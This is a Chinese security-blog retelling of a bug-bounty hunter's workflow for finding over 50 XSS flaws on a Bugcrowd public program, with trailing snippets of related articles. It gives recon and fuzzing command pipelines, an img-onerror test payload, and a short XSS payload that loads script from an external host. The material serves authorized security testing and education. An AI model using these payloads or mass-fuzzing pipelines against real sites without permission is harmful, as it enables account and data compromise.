如何在Bugcrowd公共项目中找到50多个XSS漏洞

VSole2022-04-20 14:14:00

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

背景介绍:

今天的分享来自一位名为Takshal(tojojo)的白帽子,他是一名来自印度的网络安全研究员和开发人员。他在信息安全行业有着3年以上的经验,同时也有自己的YouTube频道,这也是他的第一篇文章,废话不多说,让我们看看这位小哥如何在公共项目中找到50个以上的XSS(跨站点脚本攻击)漏洞。

出于安全原因,目标站点统一称之为abc.com。

选定目标后,无非就是目标侦查和收集工作了,在此过程中小哥使用到工具有:

  • AssetFinder
  • SubFinder
  • Amass
  • Find-domain
  • Google Dorking

(注意:以上这些工具通常用于发现目标子域)

运行工具后,小哥收集到了576个子域信息,下一个过程是找到活跃的子域数量,对于这个过程,很多白帽子使用HTTPX,速度也会快一些,但白帽小哥更喜欢使用HTTProbe,这是由安全研究员Tomonomnom制作的工具,因为白帽小哥也是Tomnonom的铁粉,

这两个工具都有自己的算法来识别子域中的开放端口,具体命令如下:

$ cat subdomains.txt | httprobe | tee -a host.txt

在探测过程后,成功找到了260个活跃主机,同时白帽小哥利用Google-Dorking技术找到一些目标子域的登录页面,于是,小哥决定这些登录功能,其中一个子域:xyz.abc.com,在完成注册过程后,小哥开始查看所有可用功能,在检查了所有内容之后,他在URL中找到了一个易受攻击的页面,在那里能够执行html注入,但却只能注入20个字符,最终白帽小哥花了大约两天的时间将html注入转换为XSS Payload:

<script/src=//NJ.₨>script>

于是,小哥很愉快的向Bugcrowd提交了漏洞报告,但是厂商却在没有通知他的情况下默默地修复了漏洞,并将漏洞报告标记为 N/A(不适用)。

骨哥画外音:原来老外也有这种骚操作~

经历了这件事之后,白帽小哥非常沮丧和失望,甚至产生了负面情绪,他甚至开始怀疑他的技能以及个人职业生涯,但最终小哥决定相信自己和这3 年来的工作经验,所以他带着自己开发的工具重回到该目标,这次他使用了自己开发的自定义爬虫脚本工具,并在 waybackurl 脚本的帮助下,提取到了超过 5000,000个 abc.com 的所有子域中的站点信息,使用的命令是:

cat host.txt | crawler | tee -a endpoint.txtcat host.txt | waybackurl | tee -a endpoint.txt

在找到500万个站点后,白帽小哥开始利用的qsreplace工具来Fuzz所有参数,以帮助其找到xss漏洞,命令如下:

cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt

执行命令后,小哥必须检查这些Payload的响应,于是他创建了一个名为Freq的工具,该工具可以在小哥的GitHub库中找到,具体执行此命令为:

cat xss_fuzz.txt | freq | tee -a possible_xss.txt

在这之后,白帽小哥成功找到了1000个站点,这些站点以明文形式响应了Payload,因此,小哥不得不手动检查所有受影响的站点,白帽小哥总共报告了大约56个XSS漏洞,目前所有漏洞都已被平台接受,还有一些其它的XSS漏洞报告尚待处理中。

信息安全xss
本作品采用《CC 协议》,转载必须注明作者和本文链接
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。
根据以上综述,本周安全威胁为中。报告显示,XSS漏洞占了报告的所有漏洞的18%,总计获得了420万美元的奖金。此外,不当访问控制漏洞所获得的奖金额度比去年同比增长134%,高达到400万美元,其次是信息披露漏洞,同比增长63%。原文链接: 2、Pulse Secure发布企业推进零信任网络的分析报告 Pulse Secure发布了有关企业推进零信任网络的分析报告。企业管理协会副总Shamus McGillicuddy表示,企业显然正在加快采取零信任网络的步伐。
我将使用Kali Linux作为此次学习的攻击者机器。网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。网络钓鱼攻击的兴起对所有组织都构成了重大威胁。这篇主要演示如何利用XSS植入钓鱼,获得管理员内部电脑权限!会弹出需要执行的XSS利用代码...选择标准代码测试!
AWS控制台中的XSS
2022-11-02 09:31:52
它是通过 AWS 漏洞披露计划报告的,现已修复。发现可以想象,对 AWS API 进行模糊测试并非易事。通过调试,很明显它正在寻找 CloudTrail 事件的特定属性,而 fuzzer 没有提供它。此外,这些值似乎被直接插入到DOM中。因此,我认为任何恶意内容都会在显示之前进行清理。虽然 CSP 不能减轻跨站点脚本攻击的原因,但它可以减轻影响。AWS 安全团队迅速做出回应,并表示他们已将信息转发给服务团队。
工业信息安全资讯
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部
云计算的发展及普及应用,降低了软硬件成本、提高了数据的可靠性,其业务按需快速定制, 时间快。但是由于云计算的开放及共享虚拟特性,使得存贮其上的信息必然面临信息安全的挑战。怎样才能使得云计算安全运行于互联网中是大家一直在探讨的问题。针对互联网环境中云计算运 行的传统及固有安全问题,我们进行了详细的阐述,并提出了科学、有效的信息安全防护方案,希 望对云计算运行以及互联网的健康发展起到积极作用。
下面详细了解sql注入、xss攻击及解决四个方面1. 什么是sql注入????所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。是最原始、最简单的攻击,从有了web2.0就有了sql注入攻击。
以下为信息安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,没有填答案是希望大家如果不懂能自己动手找到答案,祝各位都能找到满意的工作:) 注:做这个List的目标不是全,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺。
当前国家形势的驱使,国家信息安全的发展经济水平的不断提升,就需要不断的提升综合国力而网络安全领域的对抗也是我国核心竞争力的一种优势;本质上是人与人之间的对抗,而网络终端、网络设备、介质以及各种工具和平台仅仅是作为辅助手段而存在。因此如何使网络安全人员合理的利用手中的各种工具和策略来提高网络安全对抗水平,是培养“高素质的网络安全和信息化人才队伍”亟需解决的问题。网络攻防演练成为各企事业单位,乃至国家
VSole
网络安全专家